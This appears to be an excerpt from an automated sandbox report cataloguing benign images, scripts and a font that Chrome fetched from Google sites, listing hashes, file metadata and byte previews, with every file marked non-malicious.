                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/p5lVJAicHuI6Ra6jtpYimNt53JZQNCcN06a-Q4fUaNVFo3cjVisZMY_UwBTg5fv2MUkrbwbfTw70N9-bbTfejp9S8rUNadIhWiqh=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx....k\U.....if251/..E...b(..I].......QI....6.E.. .....J[+..1.-...i..:1.d...E..f........].=.2..C.N."""".g|_`p....^........Tf....x...G.'}?..-...\d........c...$...0iL...3...r......=.2...q.1...`l...m..L..6.|.....q5rO.7.....J.=.6K..D....,....$}.2].&v.8...........`.."..9......xm..^..v../...v.b`9*./...n.b`y../..C............/../..........Id.b.x.>x1p.b...8...^...X./.N.......u.b..q..Y8....... .9-}`H..Z2.t.....o.....]..)H....r..h..........K..V....c..1p..8p..8...........c......5......w..P.....ug1~.....Z.K.&.Su...o.:.6.L^..Ee...C6..+G.....s.:>z.{|...Z.S..Nu....l...\..(ep........"....P.:.......m....~.!...q...-..DV.......1...q.I.Y\)]/7.....Ov...z..n.?..E....[[........8ly..%...Y....B6.u.S9....K>>S.!...?......B..........u......Y..E...O.VI.e"`~..7^;..^.|1..c_...{.~.........M^}.[...a*....UD-.^vE._w{.."....E...G.Ql..).}.7Z7..|.T&j.]If..m..k_.'K#...D..{..'..P.....%8.......?...4....6.......L..1...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4883
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.957249280703148
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oHDOMqOW9A42Gj3lY6uVlltmXoIzcfOVKR13/YYYcWPJUV3+O+EtWwxC:oHDzqOWSGj+TXmXoIzVVKH/ePaTvte
                                                                                                                                                                                                                                                                                          MD5:DD9CE681146E98F99DA3F328FFB195B4
                                                                                                                                                                                                                                                                                          SHA1:0195DA0CEA828BB1E00B4A60A36CCF4DD87A64F7
                                                                                                                                                                                                                                                                                          SHA-256:005A040CA94B0B4D5303B3110D62DC7A664D7A41E7C08B31E68A7C3B5EC99643
                                                                                                                                                                                                                                                                                          SHA-512:FC70ED46CD2378AADA92826060699E63C8C3D0276C62F96926DE4C124D59DE2D450E7DE65390AFFF982166F1596751E7650F3F055FB3275A5378DAB1AD23D9A3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/iP-z8txDr3nlls3-oUo38PkHRmEyAJ0biVE52VyF_jPV8IYzANODEi8arqixXSn27AspqpmvG-7jbouNAUB1HicnS1dh3LZ4C_WsPKVZ1ik_2CmO=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.............sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2...`IDATx..]{p\.y.}..K..k%[.dI.._...Q.^.C].i1.....yL..i..J.f(3...4.MH.).f.$.)..........c....%.....}.{...{..wW........{.......s..Q.....X((.] ....JD..%......B....Dt.P".@(.] ....JD..%.......o..G.........R..K..!0C..2\.^..*X1.S.$....v....go...5D......i0X......i.-m._Y.r.Vh...o.......3y..W..!?)....$kC2..z~s..'.?xc..fT}.D.O.~...d..s.......kG.}.*...O.G..Y+.`...;./m:1unc.q!.. @..@..S.t./N..g.......7....e./..9...P&......;>|#.....}[......"Dg....}o.... .......l}...s...M.>y.hK.b.f`..Q...E9'..)........i.........9. ....^.R...R...u./...Ld>!..............:u.,K,......S...x...?].T].V.'.(U?.~..t$......U9.9.L...b}..........3v,..G\..]P>.9..{.....).XlV.w..Q..A.....C..35._..d.q..y.T....e.f..w..&. B...>b..x*8z[....@.:....b.'.kw....WUB. 7.E..D....'.N...u.x1.wG..0%.!........?.#.uU.....1.i.T...Uv/..D..{0d..#.,nW..uo.~
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5491
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952122786410624
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:ZTt2X7yBKsdU6AyKBrAQaAH6z38g5GgGi2MhC+K/JbKniaOjfkyYUMmMUTkx:ZTt2X7oU6AyK6b8OGQ5WJ9jfkyYUMmdW
                                                                                                                                                                                                                                                                                          MD5:2ED595CE7E64CAFE65E9FD2E3CE43CAF
                                                                                                                                                                                                                                                                                          SHA1:D9AC21F53EE1076D9A3A9339EF40685F443E7A37
                                                                                                                                                                                                                                                                                          SHA-256:275ACA5846C53DB033A8436D6E9A274912A2FFE64759B4411575759C468D6108
                                                                                                                                                                                                                                                                                          SHA-512:1C545BC730B4931CA7CDEA05070645C7A3BEBF56FACF5B0D0B3BD366FBEB9871CD9F3E6087D0419ACB080A477A150384821B5C39B6ADE48C1FFFA27F2252637C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Qvc6rWiGG_a6LNQ7Yx5vMmve_5ku8TG7z4vmWG7VBkbcOQfOSE2BS7eBcD1NUOWTsbs9A_Vh-mJpKtsGtG_0f7sIGFy5LwhdOLRg4w=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....*IDATx..k.$.U..........Y.....;....(..H....B...!.Q..oH.+..P......J.D........8......d.~..><...{.P.3.].....cK....t.{.9uO.s.=....c.1..c.1..c.1..c.1..c.1..c..B%.X..WO(u..".....%.....K..".u...`I7.v[.[.W...j...|:.g.u.^..P.....Q.s..t](....S..<..D......\T..>....x{...].W.vg.^....^4U..yC.P...~...K..#ar......%.r.*T5...Hy..'~..............?.o..t^R....=`.;.N..6)MA$..a.N........U<...w../....?......i..B....l..TI.n......Or..............`...~.-.......G.c.-l.6lq.?.....7.0*X5....&D....MZ.......v.ko6.......N...o.... .\&.....3.__..-.[p..$4.J.u...J........NJc#..B........yFM.#.H...NE..`...j.t1=D...B<I.7.$.=.n.{/....n15...,...h..vR..7M..s]....'.Qk....../3....TK.h%........+.....v...wQQ.D{;S......tz.......y.O..mw...B=....Z..\)E...FH.Ia..G.S`.mN&.)<_.....@..}.j..*p3. .....=...bt.1........}.z.8#..F....V...<....:......|*.c.RgTp.1:..k....2[Fv...3...A....2.!}`.......a..:.S.=....G..u...NM.t..Fb....+....E...A.o8e...l...F.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 287, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):374689
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989828341431557
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:fYzAbkaJw7rCCTmYjs+KUXQhEiV3TaESRcKFKn1WMCHJNUfS1EGU/S0fD9uDGYBB:AzAbjQrCQjJmJaEKZUnILUK1P079uD9
                                                                                                                                                                                                                                                                                          MD5:9DFC177F59BCC8567988BDC302F05B7E
                                                                                                                                                                                                                                                                                          SHA1:F72128465036FDD6D119F1CFE6F37C9010F908E6
                                                                                                                                                                                                                                                                                          SHA-256:61F1CF23F1ADEE8CB6510AA0CFBFDE9E956985788F1BE71556C20CC806FEF2B3
                                                                                                                                                                                                                                                                                          SHA-512:E10FB7B41B1055C8C510BC2CB0C3A5C5678081DF1465D363A49154DD6689C2FA0DE9CF5C4F4FEED366FD8742F1556741EE92C78B4F0231CC15D7FEF5B99FB638
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............7.~)....sBIT....|.d... .IDATx...w.d.q...W....j..x.`0..;. ....R...RGI.F...gW..V+...R..)-)Z...g0..t.....e..7...e.......P.z..eFFd./"22!..gF.._.7.....4zfg...1,M....g8....k...X...0.........I.....<....FK .A.+..Q...p3....\<.....:.r ..Z.` .V.....Xx......._[b. Y(........%..f....].s..UrBA....yD..>.Q........!.J.c^....f......Y.M.........AN.X..3B..F{.M.......!R.."..YRg.+._..f...Z..qx.0A.c,..Y....k....'Q.1...g.3.....?..d4vb...q#.%(......a.L..}.>..<p..Z......P)9....z.G|....(.}w..4......".......M..:.c..|...8~....+(..:..S.0.r.Z...m.b........Kt.......0.MZ.W...9L:...I>...Ka/.c..2kK+...+...../~......#....G.?..."W.~....".YEm.a...D..;:.........4z..G..q..uT..&3...}>..0.n.9p...c...$..Y.*....F.._......_eU.F.QP.P....KAA..$IBT. d.j.....Y.{...p..16Fwk....... .JB^.c../0s....Vd%.......I..).r.M6..............r....hU...[..y[.;]..mhK....j......F}].. .p...,#.A>..O?w.n....V.!....b4g.%..$.zS.@....2n......8..)|.(z.:&.L...........+.....}.....d...&>o+7.V8..o3|.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.845350936622435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:a3s5E3C:a3KE3C
                                                                                                                                                                                                                                                                                          MD5:169FD8A4A66188491593969BAD0F4EAB
                                                                                                                                                                                                                                                                                          SHA1:5DCF616EAED4D8DD3537549BFAF997E6726F6450
                                                                                                                                                                                                                                                                                          SHA-256:A0A1F98FCA203B8561519A06BACFDC50E4B3C4A5A71E740DA5B0875BD4FC00D6
                                                                                                                                                                                                                                                                                          SHA-512:9D4A767C5DF1CCBD92F4D19DF6A32079BC498727A4D9DB255A5C424925A589BCD3B858137B48DC07D4097A1AA329194CC2C60AA7CF3F322B7B81D9F24DCA05F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{ "required": false }.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5268
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.934303412189919
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OoDKfJfSWvT1aeJ7xum8IjHpOffBdJxHEU72GSmeh5XrHfhsvADZ8Ym71:O6KfTvTAeE8Jg/UkefJsCQ1
                                                                                                                                                                                                                                                                                          MD5:ECDB64DF3C43153CC2EF90DD9EBFDC9C
                                                                                                                                                                                                                                                                                          SHA1:3CE421421E02252E69F0CF5C8CE45D17CF46CD3F
                                                                                                                                                                                                                                                                                          SHA-256:7714E183A0DC5240E3DF84F877EEFA7CEE1AE6370AE865F124E982952FC9D01F
                                                                                                                                                                                                                                                                                          SHA-512:7C51A4C7CA03147022512450E526E5969EB8473AB0BFA2CA108B907115630996B130F60F90DAE30DBD23E89727B142C201A4418F5526AC35DAB65F2FCBE57C6B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....KIDATx..]i...u...mf.M+..Y...J..&....`c;..d3!.`7U@l.\Hb...Wab.Z0...")..'..0 (. c.,6.`..!..7o.{....7.....L..}U.4..[...s.m`.S....0.)t..J..gMJ..O..R,@ .$...)k....9HS...+7(..4.0....G'x.d"V.....,...39o.`....A...X.c..5d..s]...'..lfn\Hue,%......}.\|../......=..w.r....{..............hT..m.....C....x&..*..........t...Q.B,......C....X!...!3(.-...%D:...q.3v....u.Bu.{.u.....<z.#.:2.+.....h. Z{.G._..F....;...)..9.....1z.............(PJ..;o.`....d.x$v.........Y......I7.....oP...........C.{.#.&.HVJ0.9...h.P...+.O-D4.6.5{..pc....j.`)....L....}D4.6..e$+W.."..........w.?t].....!8.....a..a ..........R.".%........E.%!.9..h...........i..J*......0..&h...W.|x....z...Ew..Bn...n....51=cj.W......h...u......q...kbf..V....M...U...'...V...&f[.X3C....iC"F.b%..b.F.....x@.b.....5....7u}NV..dY.(.d...j.s..t..&.,K..K....jT,.....$y.7.&hfJ......]]Bu......U5z#j.U..\k..g.....pS...A..Aea@$rU .}4.....z,...._.^..A)..e....H.....>..(.M
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7246)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):16066
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.342160382206587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:QQx/Md02SvOiuEUqU0IYUncu4Kvc1BZWAuLVEzbaGS7D9ATPXrv:QQx/Mn4vuEUqU0IYUnD4KU1BZWAUa27g
                                                                                                                                                                                                                                                                                          MD5:444B4E1B4411D816BCBFA767A62D0B3F
                                                                                                                                                                                                                                                                                          SHA1:2AB36FBB8802349E6382D5E0CA25678EF28C914E
                                                                                                                                                                                                                                                                                          SHA-256:6140AE24B56866190868C56BA479658D0A4222ADE39F6D3FA7CBE556695A0465
                                                                                                                                                                                                                                                                                          SHA-512:F1634B12FC71688D6E82353A7E258CBC3D69026FCDD7493B5C3666F6D96ED77B415E1119A3A1FAB9C9CBF67C39B4906A1B672D6A31EBD64A1BE1ADE19E972D7A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/ycaG4YXp.min.js
                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2019 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const P=window,V=P.ShadowRoot&&(P.ShadyCSS===void 0||P.ShadyCSS.nativeShadow)&&"adoptedStyleSheets"in Document.prototype&&"replace"in CSSStyleSheet.prototype,W=Symbol(),q=new WeakMap;let it=class{constructor(t,e,s){if(this._$cssResult$=!0,s!==W)throw Error("CSSResult is not constructable. Use `unsafeCSS` or `css` instead.");this.cssText=t,this.t=e}get styleSheet(){let t=this.o;const e=this.t;if(V&&t===void 0){const s=e!==void 0&&e.length===1;s&&(t=q.get(e)),t===void 0&&((this.o=t=new CSSStyleSheet).replaceSync(this.cssText),s&&q.set(e,t))}return t}toString(){return this.cssText}};const dt=n=>new it(typeof n=="string"?n:n+"",void 0,W),Ct=(n,...t)=>{const e=n.length===1?n[0]:t.reduce((s,i,r)=>s+(o=>{if(o._$cssResult$===!0)return o.cssText;if(typeof o=="number")return o;throw Error("Value passed to 'css' function must be a 'css' function result: "+o+". Use 'unsafeCSS' to pass non-literal values, but t
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):550440
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5676135591183287
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:OiMSYySvJgMe2Z/RPSCIZ+mxsUAWyo1XiMRdma6DdY5lkVvk9ZTK:KSYyOfe2Z/RPSL+Af19dmacdY3Xo
                                                                                                                                                                                                                                                                                          MD5:22BB0C949C71C5ABF61C6C3088C4252F
                                                                                                                                                                                                                                                                                          SHA1:B30960D75F76ABF0CFEE9711F2F88F5569B763A7
                                                                                                                                                                                                                                                                                          SHA-256:A638BBB6B266673115B902ABC5094C813228EEC65955AFFD3E6AB7EFD2F34A55
                                                                                                                                                                                                                                                                                          SHA-512:EF53A1A28136712A394A0A07F7C9CE8A2DCE02CD4368DC1B87CF0511C806539BFE04AC4F43156B92805E55C867A354338EC05AC55AC1E95FB8C500BD8401D5D7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF f..WEBPVP8L.f../..D..u!...R.....G..........ea._d....T..E......&...9..t.h<...L..=...,.%N.C"..x...:.&...M..&.m....;..d.]..6e......:w.%`6N..sd.....H.F#.....{}?...+i...t.?<...Nr.[....{.g4...lI.Q...'..s.{./333.eff........kg..-%.c.v$Y....{.....x.........|....olc.(.a..I..Y.....l1[.l........{....B.?..#..%..,.l .L..H.....}a.vl.$[.y..Df.z...9l..6m.6..m.5l.Xj.;#..X.mUm:I...}o<.......8.m.V.wwB...c.).9.d..oU.O...5r.......2W.......PD>."IVme.}+.$..;._.....wf..1.d.m..$..... ..)....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5770
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.924824783269047
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nwgt2TQee/zzHAW1hK2WxDNu0Oq8oZxBW/HcV9KoEG2aEOhPSSiZkiWef+tz5VRj:nZtNLzRKbnOq8oZxXuOhaSiZlWlVRj
                                                                                                                                                                                                                                                                                          MD5:FDFC174492FB323F088A603C40548D53
                                                                                                                                                                                                                                                                                          SHA1:4C55C7C71777CDF5A04DD4F52CC43C92F6A9BE40
                                                                                                                                                                                                                                                                                          SHA-256:2CC5E0495CE1DD2AB2C741326ACBC5E070A98F3D75C12EBBE3C453F65652585E
                                                                                                                                                                                                                                                                                          SHA-512:CDA3B05FC3B62AE09A84EE570168671532AF379AC8682891519E0CC8901B1D0BC076C91D7584366DEBE94469A2B6FE94C81F5A07B57BAF129894374931BE9B5E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i2!3i4!4i256!2m3!1e0!2sm!3i707457593!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=80882
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8Lv.../..?.o...$e.+.....m#)...{.c.S.F..].e.E....Q.._.%..5...-....,...sf.tO...m$}?b.-...U.@....(i-. ......m.(F.b..u..*....o...v..j...W\.z...9y2.}....i.F....k..4.eH..0%......:.:.fz;k..S....NC....@...d3.k.F.w.V.&!.....9.....8..Q..M.S.0N4..6..t.M(K..!....l9....n.V....C...677.....yxH>G[.aL/...u....~r."...p...w1...M.w..hooksw^~*Z...!d....E..\*...1...C..^.{..4.0M..N{...I9..r..e..0. ..n.F...t.... .....9.........GE.f...$...<,.>q......cu...U....:....Rh>.K..<..G.*owX..2...9.I]VN.=.....n.M.....6..T....y.w6..%....h0.(.... .fZ..E.z.~0/5`w@.y\.}.Ii.}._|?...........y..i...);.~.m..8......Y-Q..9ZH...!..0..~Q......Z..p...o.).U?...V.Z.>Q...t.p1....e-.f.z..(c..\..=[.v........[.YTfm. s..Y.....A....T..8...1.i.&..I..E......U"..z6/r.$.@.j...Q..4.....-.K...l....Lb.D......|.:....Q.y.T&...=..:.!..;;.a?.....}.#..x......i......a...r.G.MjY.o...c..A.?....&.6w..%G...,......<..........p.F...`s.#x.(.$9..@}..M5!..x[.0.k.a...9&It.Q..`.B.b....Q@.3I.[H".Ir.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1642)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2151
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1810189657952215
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:OdWYrD+u2NnijsMnVOil6PSByN98s9mUoUHoro:svsMnVODSBywtk6o
                                                                                                                                                                                                                                                                                          MD5:A5408C6762C59EEE8E1AAAD5FF00481B
                                                                                                                                                                                                                                                                                          SHA1:0373850652D0E809878C4918E11C65A9B270DF4E
                                                                                                                                                                                                                                                                                          SHA-256:0666F89133D0E1D25897E51F31D3FFDE6F799A00106465FEE031BC9D6072E703
                                                                                                                                                                                                                                                                                          SHA-512:67279DD4390DD2D143A59D1E4B9C6BE1CAE9CD5D9775D239EF5ED036B3F354B4DEF97885694F44AD93884CFF238D1E8D220309F727A47E7FA030315EFF3F57C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/vQ8El_Rl.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as g,s as u,x as c}from"./ycaG4YXp.min.js";import{e as b}from"./0XPwTFcg.min.js";import{n as e}from"./IYoTYjYE.min.js";import{o as f}from"./5Ss99t85.min.js";import{o as d}from"./RpI-OtYr.min.js";const v=":host{display:block;--bds-group-gap: 24px}.container{align-items:var(--bds-group-align-items, center);column-gap:var(--bds-group-gap);display:flex;flex-flow:row wrap;justify-content:var(--bds-group-justify-content);row-gap:var(--bds-group-row-gap, var(--bds-group-gap));width:100%}.positionLeft{--bds-group-justify-content: flex-start}.positionCenter{--bds-group-align-items: center;--bds-group-justify-content: center}.positionRight{--bds-group-justify-content: flex-end}.positionApart{--bds-group-justify-content: space-between}.verticalPositionTop{--bds-group-align-items: flex-start}.verticalPositionBottom{--bds-group-align-items: flex-end}.verticalPositionCenter{--bds-group-align-items: center}.noWrap{flex-wrap:nowrap}";var m=Object.defineProperty,y=Object.getOwnPropertyDescript
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 20784, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):20784
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989041194123322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:ldrXYIW4bkISLBTb0r2/y5Eod0/ihRUCuZwCGQf1Hvw/WCZmMyz6:l9YIWzIAfe6yTd0/k0ZZGQ1Y+c9yO
                                                                                                                                                                                                                                                                                          MD5:E11C810C086DF83C0876DD59ED32EBCB
                                                                                                                                                                                                                                                                                          SHA1:B89FE2ED6D016F81AF13B35797AD2B0E2E5C6822
                                                                                                                                                                                                                                                                                          SHA-256:ACC5497E76F832D950D14FCFA047DC3C864F7A0AAE4C7A20521C0C655A53033B
                                                                                                                                                                                                                                                                                          SHA-512:DB93E7E4818B40C7B16C241441A5BBFCD335121A89A737611ACA4E5BD1F22A7D8FD9A1E79E0D0A7701A497CF6BBC238A7417D5DAC3480D20D4742B9B9717A15C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79oQ.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......Q0.......l..P..............................b..@.`..~..L..u.....D..'.....6.$.... .....X..#.....6..w;.v....n....yeUtv0v;.+...e..g$'24P.i.6n.!f;C.s&q...S...d..".............T;:....$...9I.....F.....?...px...q.:..qN.+G.X.i.....7N... p.cN...t...wb..."...E>....'Q..._=g... ..1......;..A........i.Z*...X.".....1T'..1.N.....s...-[.-.c.c;.I..@w.>...==...L...C.8.....m..)n,.........8....%.Z..~.W..o....^.*_-_.D...{.~.i.......U.J."..P..%E.nB=.f...5...J...:.$dQ.T).l_..t1...1.o.aI....C.........a[...d......a.:w...-x.;.2.. ...CjA..u...&iS..[.%.G...../n...#.....:../.+.1..........O../.....9g..Cf.J.....&....pS.h.......M%.......=.>&.E..Rj+..#.e]....G.*.bE,...`.........s.V.].\9.....S....e$.....).".PU.......\..n.Kl[u..+..U.....M&...,......R.U.....;ck......Y..j.....i5.*f#.x............t..[ ..Q.0A.W.......xV....:M.\..r#M`2.R.l..p..p......O...P...k6...F4O..%...x...5}g...OY?.8.0..f..+....`Tb3S@a..Q.A...%. ......(..;..P;.Q...k.AJH.s...l.^...^.!.......cc,=.......o
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):289026
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8634802342545584
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:z5wIG8iYLWM++Mr72ESBVL4YFAuDmFXlzOeVyoZ:z5wIG8hLJFizmq+A91ae0C
                                                                                                                                                                                                                                                                                          MD5:8456A6083B876E455A033455E43B8075
                                                                                                                                                                                                                                                                                          SHA1:BD2B7F39671C80C4AF8CBBD21397714F5745E245
                                                                                                                                                                                                                                                                                          SHA-256:C51DC73B33292EEB510DD9B03A5518566FC67F97C07FCEB8F344EEFDD894CE25
                                                                                                                                                                                                                                                                                          SHA-512:54683238FC4EAD3D4A42D61FB122AC166F74E3E7D355F5653546BC769A7BC8C8A02A85D86F76722A56558E5F979FED406E30182370B9A0814782DCBF0153E827
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.h..WEBPVP8L.h../..D..u!...b...(.z.;..1.VVY..*.........m.......U.X...V.P+J,))8v:.8T...;j..v..4.e.=.YNG..d..a{.2+.......{..q.,..ig.&;.u.'......=.....8.`...@,..P.|.W.[?.......D..=..y.}....'...{...9..=r..b..b..1v...L.v2z.3..+.r..:.I....gs...u.H.....D.....h.V..m.]y..;..i..3...v.gVY..3..{..ne9.M.&...0..zbX@..x......m...m..~^8=.8.P.f.B%.4...&=.p.&..."......K.V..;....8Hw.p....%..v..vF[K..T[M..p.P........i..F...O.h.1..x... S...V....I.P.wn...>r..m....}i..wB..L..:.XK...m...`.L.=..........0.)..z. .m......O..m$i;nP.!...X.E.C.=.<.j..Mh=..nb.....<......2..A.T.9.ml...}..b.(.m...m...."...A.\s..$.j,I| .^......m.......8..$i...i.d...5..Mz...P.H....8.................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9027), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9027
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947824943141241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:GFmlLkHo/a1rOQEo/eKO1O/XozXo/5VoD9ScNOR7cibmxuWK6:GcNn/a1rB//eKO1OQM/0D97OdCxu4
                                                                                                                                                                                                                                                                                          MD5:8F51790BFFFCC31ED97977E0F694A3A6
                                                                                                                                                                                                                                                                                          SHA1:734B38A9909BB10C3F8C6ACDABAF90BE5B01223C
                                                                                                                                                                                                                                                                                          SHA-256:372DCB604072BE98F12E6B48ECF53AA4238767FB34CC47723EEB3FC5552A65D0
